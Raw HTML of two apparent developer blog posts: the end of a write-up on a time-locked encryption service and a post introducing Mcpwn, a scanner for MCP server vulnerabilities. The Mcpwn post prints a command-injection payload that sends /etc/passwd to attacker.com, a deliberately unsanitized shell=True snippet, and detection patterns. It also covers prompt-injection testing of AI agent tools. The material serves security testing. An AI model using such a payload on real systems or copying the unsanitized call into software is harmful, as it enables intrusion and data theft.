class="o">=</span><span class="p">{</span><span class="nx">e</span> <span class="o">=&gt;</span> <span class="nf">setContent</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">)}</span> <span class="sr">/</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">input</span> <span class="kd">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">datetime-local</span><span class="dl">"</span> <span class="nx">onChange</span><span class="o">=</span><span class="p">{</span><span class="nx">e</span> <span class="o">=&gt;</span> <span class="nf">setUnlockTime</span><span class="p">(</span><span class="k">new</span> <span class="nc">Date</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">target</span><span class="p">.</span><span class="nx">value</span><span class="p">))}</span> <span class="sr">/</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="nx">button</span> <span class="kd">type</span><span class="o">=</span><span class="dl">"</span><span class="s2">submit</span><span class="dl">"</span><span class="o">&gt;</span><span class="nx">Create</span> <span class="nx">Time</span><span class="o">-</span><span class="nx">Seal</span><span class="o">&lt;</span><span class="sr">/button</span><span class="err">&gt; </span> <span class="o">&lt;</span><span class="sr">/form</span><span class="err">&gt; </span> <span class="p">);</span> <span class="p">}</span> </code></pre> </div> <h2> Deployment </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Install Wrangler CLI</span> npm <span class="nb">install</span> <span class="nt">-g</span> wrangler <span class="c"># Create D1 database</span> wrangler d1 create timeseal-db <span class="c"># Run migrations</span> wrangler d1 migrations apply timeseal-db <span class="c"># Set secrets</span> openssl rand <span class="nt">-base64</span> 32 | wrangler secret put MASTER_ENCRYPTION_KEY <span class="c"># Deploy to Cloudflare Workers</span> npm run deploy </code></pre> </div> <p><strong>wrangler.toml:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight toml"><code><span class="py">name</span> <span class="p">=</span> <span class="s">"timeseal"</span> <span class="py">main</span> <span class="p">=</span> <span class="s">"src/index.ts"</span> <span class="py">compatibility_date</span> <span class="p">=</span> <span class="s">"2024-01-01"</span> <span class="nn">[[d1_databases]]</span> <span class="py">binding</span> <span class="p">=</span> <span class="s">"DB"</span> <span class="py">database_name</span> <span class="p">=</span> <span class="s">"timeseal-db"</span> <span class="py">database_id</span> <span class="p">=</span> <span class="s">"your-database-id"</span> <span class="nn">[vars]</span> <span class="py">MAX_DURATION_DAYS</span> <span class="p">=</span> <span class="mi">30</span> <span class="py">RATE_LIMIT_WINDOW</span> <span class="p">=</span> <span class="mi">3600</span> <span class="py">RATE_LIMIT_MAX</span> <span class="p">=</span> <span class="mi">100</span> </code></pre> </div> <h2> Attack Scenarios &amp; Defenses </h2> <h3> "Can I change my computer's clock?" </h3> <blockquote> <p><strong>No.</strong> Time checks happen server-side using Cloudflare's NTP-synchronized infrastructure. Your local clock is irrelevant.</p> </blockquote> <h3> "What if I steal the database?" </h3> <blockquote> <p><strong>You get encrypted blobs.</strong> Without the master encryption key (environment secret) and Key A (URL hash), decryption is impossible.</p> </blockquote> <h3> "Can I replay pulse tokens?" </h3> <blockquote> <p><strong>No.</strong> Nonces are checked atomically before processing. Concurrent requests are detected and rejected.</p> </blockquote> <h3> "Can I brute-force the seal ID?" </h3> <blockquote> <p><strong>Extremely unlikely.</strong> Seal IDs are 32 hex characters (16 bytes) = <code>2^128</code> combinations. Even if you guess it, you still need Key A to decrypt.</p> </blockquote> <h2> Performance Metrics </h2> <ul> <li> <strong>Seal creation</strong>: <code>~200ms</code> (includes encryption + DB write)</li> <li> <strong>Unlock check</strong>: <code>~50ms</code> (DB query + time check)</li> <li> <strong>Decryption</strong>: <code>~10ms</code> (client-side, Web Crypto API)</li> <li> <strong>Global latency</strong>: <code>&lt;100ms</code> (Cloudflare edge network)</li> </ul> <h2> Lessons Learned </h2> <ol> <li> <strong>Split-key architecture eliminates trust</strong>: No single party can decrypt early</li> <li> <strong>Edge computing enables global time enforcement</strong>: Cloudflare Workers provide consistent time across regions</li> <li> <strong>Atomic operations prevent race conditions</strong>: Database transactions are critical for Dead Man's Switch</li> <li> <strong>Browser fingerprinting beats IP-based rate limiting</strong>: SHA-256 hashing preserves privacy</li> <li> <strong>URL hash is perfect for client-side secrets</strong>: Never transmitted to server, HTTPS-protected</li> </ol> <h2> Open Source &amp; Self-Hosting </h2> <p>TimeSeal is open source under the Business Source License (converts to Apache 2.0 after 4 years):</p> <ul> <li> <strong>GitHub</strong>: <a href="https://github.com/teycir/timeseal" rel="noopener noreferrer">https://github.com/teycir/timeseal</a> </li> <li> <strong>Live Demo</strong>: <a href="https://timeseal.online" rel="noopener noreferrer">https://timeseal.online</a> </li> <li> <strong>Docs</strong>: Complete API reference, security audit, self-hosting guide</li> </ul> <p>Self-hosting lets you:</p> <ul> <li>Eliminate trust in third-party infrastructure</li> <li>Customize retention policies</li> <li>Deploy on private networks</li> <li>Audit the entire stack</li> </ul> <h2> Future Roadmap </h2> <ul> <li> <strong>Progressive disclosure</strong>: Chain multiple seals for staged reveals</li> <li> <strong>Multi-party seals</strong>: Require N-of-M keys to unlock</li> <li> <strong>Hardware security modules</strong>: Store master key in Cloudflare's HSM</li> <li> <strong>Blockchain anchoring</strong>: Publish seal hashes for tamper-evidence</li> </ul> <h2> Conclusion </h2> <p>Building cryptographically enforced time locks requires careful architecture:</p> <ol> <li> <strong>Split keys</strong> between client and server</li> <li> <strong>Encrypt everything</strong> (client-side + server-side + master key)</li> <li> <strong>Enforce time server-side</strong> (never trust the client)</li> <li> <strong>Use edge computing</strong> for global consistency</li> <li> <strong>Prevent replay attacks</strong> with nonces and signatures</li> <li> <strong>Rate limit aggressively</strong> with fingerprinting</li> <li> <strong>Audit everything</strong> for transparency</li> </ol> <blockquote> <p>The result is a system where early decryption is mathematically impossible, even with full server access. No trust required—just cryptography and edge computing.</p> </blockquote> <p><strong>Try it yourself</strong>: <a href="https://timeseal.online" rel="noopener noreferrer">https://timeseal.online</a><br><br> <strong>Source code</strong>: <a href="https://github.com/teycir/timeseal" rel="noopener noreferrer">https://github.com/teycir/timeseal</a><br><br> <strong>Questions?</strong> Drop a comment below or open a GitHub issue.</p> <p><em>Built with 💚 and 🔒 by <a href="https://teycirbensoltane.tn" rel="noopener noreferrer">Teycir Ben Soltane</a></em></p> cryptography nextjs cloudflare opensource Teycir Ben Soltane Sat, 13 Dec 2025 17:40:08 +0000 https://forem.com/teycir/building-a-security-scanner-for-mcp-servers-41am https://forem.com/teycir/building-a-security-scanner-for-mcp-servers-41am <p>Model Context Protocol (MCP) is Anthropic's new standard for connecting AI agents to external tools and data sources. As I started working with MCP servers, I realized something concerning: <strong>there's no automated security testing for them</strong>.</p> <h2> The Problem </h2> <p>MCP servers provide AI agents with strong abilities, including file operations, command execution, and database access. One vulnerable tool can mean full system compromise. Manual code reviews often overlook injection vulnerabilities in tool arguments.</p> <p>Here's what I found during a security review:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Looks safe in code review, right? </span><span class="k">def</span> <span class="nf">execute_command</span><span class="p">(</span><span class="n">command</span><span class="p">:</span> <span class="nb">str</span><span class="p">):</span> <span class="k">return</span> <span class="n">subprocess</span><span class="p">.</span><span class="nf">run</span><span class="p">(</span><span class="n">command</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span> </code></pre> </div> <p>The vulnerability? Tool arguments weren't sanitized. An AI agent could inject:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="s2">"ls; curl http://attacker.com/exfil?data=</span><span class="si">$(</span><span class="nb">cat</span> /etc/passwd<span class="si">)</span><span class="s2">"</span> </code></pre> </div> <h2> Building Mcpwn </h2> <p>I built <strong>Mcpwn</strong> - an automated security scanner for MCP servers. The name is a play on "MCP pwn" (compromise).</p> <h3> Key Design Decisions </h3> <p><strong>1. Semantic Detection Over Crash Detection</strong></p> <p>Instead of looking for crashes, Mcpwn analyzes response content for patterns:</p> <ul> <li> <code>uid=1000(user)</code> → Command injection</li> <li> <code>root:x:0:0:root</code> → Path traversal</li> <li> <code>-----BEGIN PRIVATE KEY</code> → File read vulnerability</li> <li>Timing deviations → Blind injection</li> </ul> <p><strong>2. Zero Dependencies</strong></p> <p>Pure Python stdlib. No pip install needed. This was critical for:</p> <ul> <li>CI/CD integration (no dependency hell)</li> <li>Security auditing (less attack surface)</li> <li>Quick adoption (clone and run)</li> </ul> <p><strong>3. Structured Output</strong></p> <p>JSON and SARIF formats for AI analysis and CI/CD integration:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"summary"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"total"</span><span class="p">:</span><span class="w"> </span><span class="mi">3</span><span class="p">,</span><span class="w"> </span><span class="nl">"by_severity"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="nl">"CRITICAL"</span><span class="p">:</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="nl">"HIGH"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">}</span><span class="w"> </span><span class="p">},</span><span class="w"> </span><span class="nl">"findings"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <h2> Architecture </h2> <p>The scanner has three core components:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>core/ ├── pentester.py # Orchestrator (thread-safe, timeout handling) ├── detector.py # Semantic detection engine └── reporter.py # JSON/HTML/SARIF reports </code></pre> </div> <h3> Attack Surface Coverage </h3> <p><strong>Currently implemented:</strong></p> <ul> <li>Tool argument injection (RCE, path traversal)</li> <li>Resource path traversal</li> <li>Prompt injection (context confusion, delimiter breakout)</li> <li>Protocol fuzzing (malformed JSON-RPC)</li> <li>State desync attacks</li> <li>Resource exhaustion</li> </ul> <p><strong>Detection example:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Semantic detector checks response patterns </span><span class="k">def</span> <span class="nf">detect_rce</span><span class="p">(</span><span class="n">response</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="n">patterns</span> <span class="o">=</span> <span class="p">[</span> <span class="sa">r</span><span class="sh">'</span><span class="s">uid=\d+\([^)]+\)</span><span class="sh">'</span><span class="p">,</span> <span class="c1"># Unix user ID </span> <span class="sa">r</span><span class="sh">'</span><span class="s">gid=\d+\([^)]+\)</span><span class="sh">'</span><span class="p">,</span> <span class="c1"># Unix group ID </span> <span class="sa">r</span><span class="sh">'</span><span class="s">root:x:0:0:root</span><span class="sh">'</span> <span class="c1"># /etc/passwd </span> <span class="p">]</span> <span class="k">return</span> <span class="nf">any</span><span class="p">(</span><span class="n">re</span><span class="p">.</span><span class="nf">search</span><span class="p">(</span><span class="n">p</span><span class="p">,</span> <span class="n">response</span><span class="p">)</span> <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="n">patterns</span><span class="p">)</span> </code></pre> </div> <h2> Real-World Impact </h2> <p>During testing, Mcpwn found <strong>RCE vulnerabilities in production MCP servers</strong> - specifically tool argument injection patterns that manual code review missed.</p> <p>Example finding:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nv">$ </span>python mcpwn.py <span class="nt">--quick</span> npx <span class="nt">-y</span> @modelcontextprotocol/server-filesystem /tmp <span class="o">[</span>INFO] Found 2 tools, 0 resources <span class="o">[</span>WARNING] execute_command: RCE via <span class="nb">command</span> <span class="o">[</span>WARNING] Detection: <span class="nv">uid</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>1000<span class="o">(</span>user<span class="o">)</span> <span class="o">[</span>INFO] Mcpwn <span class="nb">complete</span> </code></pre> </div> <h2> Usage </h2> <p><strong>Quick scan (5 seconds):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python mcpwn.py <span class="nt">--quick</span> npx <span class="nt">-y</span> @modelcontextprotocol/server-filesystem /tmp </code></pre> </div> <p><strong>Generate JSON report for AI analysis:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python mcpwn.py <span class="nt">--output-json</span> report.json &lt;your-mcp-server&gt; </code></pre> </div> <p><strong>CI/CD integration (SARIF format):</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>python mcpwn.py <span class="nt">--output-sarif</span> report.sarif &lt;your-mcp-server&gt; </code></pre> </div> <h2> AI-Assisted Security Workflow </h2> <p>Mcpwn is designed to work with AI assistants:</p> <ol> <li> <strong>Automated baseline scan</strong> → Mcpwn finds pattern-based vulnerabilities</li> <li> <strong>Structured output</strong> → JSON/SARIF for AI parsing</li> <li> <strong>AI deep analysis</strong> → Validates findings, finds logic flaws Mcpwn missed</li> </ol> <p>This hybrid approach combines automated pattern matching with AI contextual understanding.</p> <h2> Lessons Learned </h2> <p><strong>1. Semantic detection beats crash detection</strong></p> <p>Looking for <code>uid=1000</code> in responses is more reliable than waiting for segfaults. Many vulnerabilities don't crash - they just leak data.</p> <p><strong>2. Thread safety is critical</strong></p> <p>MCP servers are concurrent. Request ID generation, health checks, and send operations all needed proper locking.</p> <p><strong>3. Timeouts everywhere</strong></p> <p>Default 10s timeout with configurable overrides. Quick mode uses 5s. Learned this after hanging on unresponsive servers.</p> <p><strong>4. False positives matter</strong></p> <p>Path traversal detection requires 2+ markers to reduce false positives. Single marker = too noisy.</p> <h2> What's Next </h2> <p><strong>Planned features:</strong></p> <ul> <li>SSRF injection detection</li> <li>Deserialization attack testing</li> <li>Schema pollution checks</li> <li>Auth bypass testing</li> </ul> <p><strong>Current limitations:</strong></p> <p>Mcpwn detects runtime exploits but misses:</p> <ul> <li>Configuration vulnerabilities (exposed credentials)</li> <li>Business logic flaws</li> <li>Complex multi-step attack chains</li> </ul> <p>Automated tools find known patterns. Manual review finds logic flaws. Use both.</p> <h2> Try It </h2> <p><strong>GitHub:</strong> <a href="https://github.com/Teycir/Mcpwn" rel="noopener noreferrer">https://github.com/Teycir/Mcpwn</a></p> <p><strong>Quick start:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>git clone https://github.com/Teycir/Mcpwn.git <span class="nb">cd </span>Mcpwn python3 mcpwn.py <span class="nt">--help</span> </code></pre> </div> <p>MIT licensed, 45 passing tests, zero dependencies.</p> <p><strong>What security testing approaches have you found effective for AI agent infrastructure? Drop a comment below.</strong></p> programming ai mcp